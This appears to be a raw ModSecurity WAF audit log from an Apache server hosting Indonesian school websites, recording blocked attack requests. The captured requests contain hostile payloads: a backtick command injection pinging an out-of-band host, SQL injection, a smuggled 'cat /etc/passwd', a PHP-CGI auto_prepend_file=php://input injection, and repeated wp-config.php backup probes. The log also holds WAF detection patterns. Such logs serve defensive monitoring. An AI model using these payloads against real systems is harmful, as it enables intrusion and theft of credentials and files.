X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Debian; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0 Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 167545659 --b8d5fb29-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b8d5fb29-E-- --b8d5fb29-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: `ping found within ARGS:ReaderNo: `ping d0mbkqa4kqtm561jt3n04zxwz7opnb1g5.oast.fun`"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747805569136011 2156 (- - -) Stopwatch2: 1747805569136011 2156; combined=608, p1=430, p2=146, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8d5fb29-Z-- --fe46f421-A-- [21/May/2025:12:32:49 +0700] aC1lgYv3pT1iV0OxjLToLAAAAIY 103.236.140.4 41892 103.236.140.4 8181 --fe46f421-B-- POST /cgi-bin/supportInstaller HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 83 User-Agent: MSIE Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: X-Varnish: 164788588 --fe46f421-C-- fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0-- --fe46f421-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe46f421-E-- --fe46f421-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! 
?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0 found within MATCHED_VAR: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: cgi-script Stopwatch: 1747805569166297 2529 (- - -) Stopwatch2: 1747805569166297 2529; combined=1541, p1=363, p2=1149, p3=0, p4=0, p5=29, sr=69, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe46f421-Z-- --e2787574-A-- [21/May/2025:12:32:50 +0700] aC1lgiioYDAgD0WHUjSngAAAAEM 103.236.140.4 41906 103.236.140.4 8181 --e2787574-B-- POST /apply_sec.cgi HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id/login_pic.asp Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 95 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: uid=1234123 X-Varnish: 167545665 --e2787574-C-- html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acat%20%2Fetc%2Fpasswd --e2787574-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2787574-E-- --e2787574-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /apply_sec.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747805570110537 1828 (- - -) Stopwatch2: 1747805570110537 1828; combined=569, p1=377, p2=165, p3=0, p4=0, p5=27, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2787574-Z-- --772ec845-A-- [21/May/2025:12:36:50 +0700] aC1mcov3pT1iV0OxjLToNQAAAJU 103.236.140.4 41944 103.236.140.4 8181 --772ec845-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.74.206.159 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.74.206.159 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --772ec845-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --772ec845-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747805810438780 3126 (- - -) Stopwatch2: 1747805810438780 3126; combined=1397, p1=483, p2=883, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --772ec845-Z-- --476c737a-A-- [21/May/2025:12:47:03 +0700] aC1o14v3pT1iV0OxjLToQQAAAJU 103.236.140.4 41990 103.236.140.4 8181 --476c737a-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 50.7.40.241 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 50.7.40.241 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --476c737a-C-- --476c737a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --476c737a-E-- --476c737a-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747806423224473 4706 (- - -) Stopwatch2: 1747806423224473 4706; combined=3057, p1=492, p2=2524, p3=0, p4=0, p5=40, sr=76, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --476c737a-Z-- --7ad37e16-A-- [21/May/2025:14:06:05 +0700] aC17XYv3pT1iV0OxjLTolgAAAJg 103.236.140.4 42488 103.236.140.4 8181 --7ad37e16-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.212.200.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.212.200.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7ad37e16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ad37e16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747811165704997 3311 (- - -) Stopwatch2: 1747811165704997 3311; combined=1465, p1=474, p2=950, p3=0, p4=0, p5=41, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ad37e16-Z-- --c9948d68-A-- [21/May/2025:14:27:17 +0700] aC2AVYv3pT1iV0OxjLTotQAAAI4 103.236.140.4 42606 103.236.140.4 8181 --c9948d68-B-- GET /wp-config.php.save.1 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.100.85.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.100.85.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Accept: */* --c9948d68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9948d68-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747812437829921 908 (- - -) Stopwatch2: 1747812437829921 908; combined=352, p1=315, p2=0, p3=0, p4=0, p5=37, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9948d68-Z-- --c09a4028-A-- [21/May/2025:14:27:21 +0700] aC2AWYv3pT1iV0OxjLTotgAAAIw 103.236.140.4 42608 103.236.140.4 8181 --c09a4028-B-- GET /wp-config.php-old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.100.85.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.100.85.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Accept: */* --c09a4028-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c09a4028-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747812441610546 760 (- - -) Stopwatch2: 1747812441610546 760; combined=294, p1=262, p2=0, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c09a4028-Z-- --d23fc274-A-- [21/May/2025:14:27:22 +0700] aC2AWov3pT1iV0OxjLTotwAAAJA 103.236.140.4 42610 103.236.140.4 8181 --d23fc274-B-- GET /wp-config.php.save. 
HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.100.85.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.100.85.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Accept: */* --d23fc274-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d23fc274-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747812442473555 634 (- - -) Stopwatch2: 1747812442473555 634; combined=246, p1=219, p2=0, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d23fc274-Z-- --bc917b2e-A-- [21/May/2025:14:27:23 +0700] aC2AW4v3pT1iV0OxjLTouAAAAJE 103.236.140.4 42612 103.236.140.4 8181 --bc917b2e-B-- GET /wp-config.php.save.2 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.100.85.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.100.85.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Accept: */* --bc917b2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc917b2e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747812443122443 650 (- - -) Stopwatch2: 1747812443122443 650; combined=247, p1=220, p2=0, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc917b2e-Z-- --f0b67110-A-- [21/May/2025:14:27:23 +0700] aC2AWxpv_mIXt2pDBOoHiQAAAMg 103.236.140.4 42618 103.236.140.4 8181 --f0b67110-B-- GET /wp-config.php.save.3 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.100.85.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.100.85.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Accept: */* --f0b67110-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0b67110-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747812443817221 718 (- - -) Stopwatch2: 1747812443817221 718; combined=261, p1=231, p2=0, p3=0, p4=0, p5=30, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0b67110-Z-- --d03f9d18-A-- [21/May/2025:14:27:24 +0700] aC2AXIv3pT1iV0OxjLTougAAAJQ 103.236.140.4 42620 103.236.140.4 8181 --d03f9d18-B-- GET /wp-config.php.save.4 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.100.85.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.100.85.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Accept: */* --d03f9d18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d03f9d18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747812444512242 649 (- - -) Stopwatch2: 1747812444512242 649; combined=243, p1=216, p2=0, p3=0, p4=0, p5=27, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d03f9d18-Z-- --ef50c65a-A-- [21/May/2025:14:27:25 +0700] aC2AXYv3pT1iV0OxjLTouwAAAI8 103.236.140.4 42622 103.236.140.4 8181 --ef50c65a-B-- GET /wp-config.php.save.5 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.100.85.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.100.85.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Accept: */* --ef50c65a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ef50c65a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747812445180122 643 (- - -) Stopwatch2: 1747812445180122 643; combined=254, p1=227, p2=0, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ef50c65a-Z-- --59251c13-A-- [21/May/2025:14:27:26 +0700] aC2AXov3pT1iV0OxjLTovAAAAJI 103.236.140.4 42624 103.236.140.4 8181 --59251c13-B-- GET /wp-config.php.save.6 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.100.85.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.100.85.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Accept: */* --59251c13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59251c13-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747812446011339 830 (- - -) Stopwatch2: 1747812446011339 830; combined=317, p1=285, p2=0, p3=0, p4=0, p5=31, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59251c13-Z-- --e9831a25-A-- [21/May/2025:14:27:26 +0700] aC2AXov3pT1iV0OxjLTovQAAAJM 103.236.140.4 42626 103.236.140.4 8181 --e9831a25-B-- GET /wp-config.php.save.7 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.100.85.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.100.85.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Accept: */* --e9831a25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9831a25-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747812446693268 648 (- - -) Stopwatch2: 1747812446693268 648; combined=247, p1=221, p2=0, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9831a25-Z-- --26923649-A-- [21/May/2025:14:27:27 +0700] aC2AXxpv_mIXt2pDBOoHigAAAMk 103.236.140.4 42628 103.236.140.4 8181 --26923649-B-- GET /wp-config.php.save.8 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.100.85.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.100.85.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Accept: */* --26923649-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --26923649-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747812447336091 683 (- - -) Stopwatch2: 1747812447336091 683; combined=282, p1=247, p2=0, p3=0, p4=0, p5=35, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --26923649-Z-- --b3883441-A-- [21/May/2025:14:27:27 +0700] aC2AX4v3pT1iV0OxjLTovgAAAJc 103.236.140.4 42630 103.236.140.4 8181 --b3883441-B-- GET /wp-config.php.save.9 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.100.85.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.100.85.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Accept: */* --b3883441-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3883441-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747812447987009 679 (- - -) Stopwatch2: 1747812447987009 679; combined=277, p1=250, p2=0, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
